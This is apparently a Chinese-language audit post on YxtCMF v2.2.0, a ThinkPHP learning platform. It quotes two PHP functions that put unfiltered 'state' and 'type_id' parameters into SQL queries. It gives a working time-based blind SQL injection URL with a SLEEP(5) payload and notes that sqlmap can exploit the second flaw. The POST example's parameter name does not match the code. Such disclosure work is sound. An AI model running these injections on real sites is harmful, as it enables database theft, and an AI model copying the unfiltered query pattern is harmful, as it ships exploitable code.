对YxtCMF一次简单审计

一个小众的cms，下载地址：http://down.admin5.com/php/133101.html

YxtCMF v2.2.0是thinkphp+bootstrap为框架进行开发的网络学习平台系统，有两处注入，不过都是需要会员登陆

由于网站没有对注入进行防护，假如开启gpc 都帮你关掉

在/index.php 中

注入1：需要先登陆

缺陷代码：对传入的$state没有进行过滤

public function order(){
                $state=I("get.state");
                $user_id=sp_get_current_userid();
                $where=empty($state)?array("user_id = $user_id"):array("user_id = $user_id and state=$state");//对传入的$state没有进行过滤
                $count=$this->order_obj->where($where)->count();
                $page = $this->page($count, 10);
                $data=$this->order_obj->limit($page->firstRow . ',' . $page->listRows)->where($where)->select();
                $num=$this->order_obj->where(array('state'=>2,'user_id'=>$user_id))->count();
        $this->assign('num',$num);
        $this->assign('order',$data);
        $this->assign('state',$state);
                $this->assign("Page", $page->show('Admin'));
        $this->display(':order');
    }

http://127.0.0.1/yxtcmf/index.php?g=user&m=center&a=order&state=1) AND (SELECT * FROM (SELECT(SLEEP(5)))pror) AND (8565=8565

注入2：需要进行以下操作，登陆以后申请成为教师

没有过滤传过来的type_id

在application\Teacher\Controller\CenterController.class.php

虽然这里注释了add 函数，但是没有对 add_post 进行注释。

function add_post(){
        if (IS_POST) {
                    $data = $this->course_obj->create();
                        $count=$this->course_obj->count();
                        $term_id=$_POST['type_id'];
                        $typedata=$this->coursetype_obj->where("term_id=$term_id")->find();//缺陷代码，没有过滤传过来的type_id。
        $teacherdata=M('application')->where(array('user_id'=>sp_get_current_userid()))->find();
                        $data['cs_teacher']=sp_get_current_userid();
                        $data['top_id']=$typedata['parent'];
                        $data['cs_picture']=$_POST['cs_picture'];
                        $data['labelid']=$_POST['labelid'];
                        $deta['notice']=$_POST['code'];
                        $deta['count']=$_POST['count'];
                                $data['cs_addtime']=date('Y-m-d H:i:s');
                        $data['cs_state']=1;
                        $data['cs_brief']=htmlspecialchars_decode($data['cs_brief']);
                        $data['course_type']=$_POST['type'];
                        $data['stu_numbers']=$_POST['stu_numbers'];
                        if($teacherdata['state']<1){
                                $this->error("您还未通过审核，暂时不能添加课程！");
                        }
                         
                if($deta['notice']=='sucess'){
                                if ($this->course_obj->add($data)) {
                                        $this->success("添加成功！",U("Teacher/Center/index"));
                                }else{
                                        $this->error("添加失败！");
                                }                        
                        }else{
                                if($count>=$deta['count']){
                                        $this->error($deta['notice']);
                                }else{
                                        if ($this->course_obj->add($data)) {
                                            $this->success("添加成功！",U("Teacher/Center/index"));
                                    }else{
                                           $this->error("添加失败！");
                                    }                        
                                }
                        }
                }
         
        }

http://172.16.9.31/yxtcmf/index.php?g=teacher&m=center&a=add_post

post:ty_id=1

由于没有做过滤，可以直接sqlmap跑出来